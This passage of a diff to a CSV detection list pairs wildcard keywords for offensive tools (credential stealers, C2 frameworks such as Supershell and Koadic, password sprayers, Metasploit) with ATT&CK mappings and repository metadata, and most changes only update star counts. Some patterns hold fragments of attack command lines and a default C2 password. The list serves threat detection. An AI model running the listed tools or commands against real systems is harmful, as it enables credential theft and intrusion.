- TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*ParseMSALCache*Appdata\Local\.IdentityService\msal.cache*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*parser.exe -a *.dmp*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" "*parser.exe -a *.dmp*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" -"*PassDetective extract*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" -"*PassDetective-main.*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*PassDetective extract*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*PassDetective-main.*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" "*passhunt.exe*","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","60","36","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" -"*passhunt.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*passhunt.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*passhunt.py*","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","60","36","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" -"*passivex.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*passivex.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*passphrase-rule1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*passphrase-rule2.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*passphrase-wordlist*","offensive_tool_keyword","passphrase-wordlist","This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1.000 permutations of each phase.","T1003 - T1110 - T1113 - T1137","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/initstring/passphrase-wordlist","1","0","N/A","N/A","10","989","149","2023-03-16T03:22:53Z","2017-12-05T20:53:13Z" +"*passivex.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*passivex.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*passphrase-rule1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*passphrase-rule2.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*passphrase-wordlist*","offensive_tool_keyword","passphrase-wordlist","This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1.000 permutations of each phase.","T1003 - T1110 - T1113 - T1137","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/initstring/passphrase-wordlist","1","0","N/A","N/A","10","992","149","2023-03-16T03:22:53Z","2017-12-05T20:53:13Z" "*pass-station search tomcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*PassTheCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*PassTheCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*passthecert.py -action add_computer -crt user.crt -key user.key -domain * -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*PassTheChallenge.cpp*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.exe*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" @@ -14536,46 +14702,46 @@ "*PasswareKitForensic_*_Setup.dmg*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PasswareKitForensic_*_Setup.msi*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*passware-kit-forensic-64bit.msi*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*password = 'tdragon6'*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*password = 'tdragon6'*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*Password*Winter2017*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*password_box.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*password_cracker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*password_crackers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*password_cracker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*password_crackers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Password_Cracking.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"*password_prompt_spoof.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*password|passwort|passwd|*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*password_prompt_spoof.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*password|passwort|passwd|*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*PasswordBoxImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*Password-Default/service.txt*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*Password-Default/service.txt*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*passwordfox.exe*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*passwordfox.zip*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*passwordfox-x64.zip*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Passwords/Leaked-Databases*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*Passwords_in_description.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Password-Scripts*","offensive_tool_keyword","Password-Scripts","Password Scripts xploitation ","T1210 - T1555 - T1110 - T1554 - T1553","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/laconicwolf/Password-Scripts","1","0","N/A","N/A","1","98","37","2019-10-08T17:57:49Z","2017-10-20T17:17:23Z" +"*Passwords/Leaked-Databases*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Passwords_in_description.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Password-Scripts*","offensive_tool_keyword","Password-Scripts","Password Scripts xploitation ","T1210 - T1555 - T1110 - T1554 - T1553","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/laconicwolf/Password-Scripts","1","0","N/A","N/A","1","99","37","2019-10-08T17:57:49Z","2017-10-20T17:17:23Z" "*PasswordSpray *","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1498","354","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" -"*passwordspray*--user-as-pass*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*passwordspray.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*passwordSprayCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*passwordspray*--user-as-pass*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*passwordspray.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth 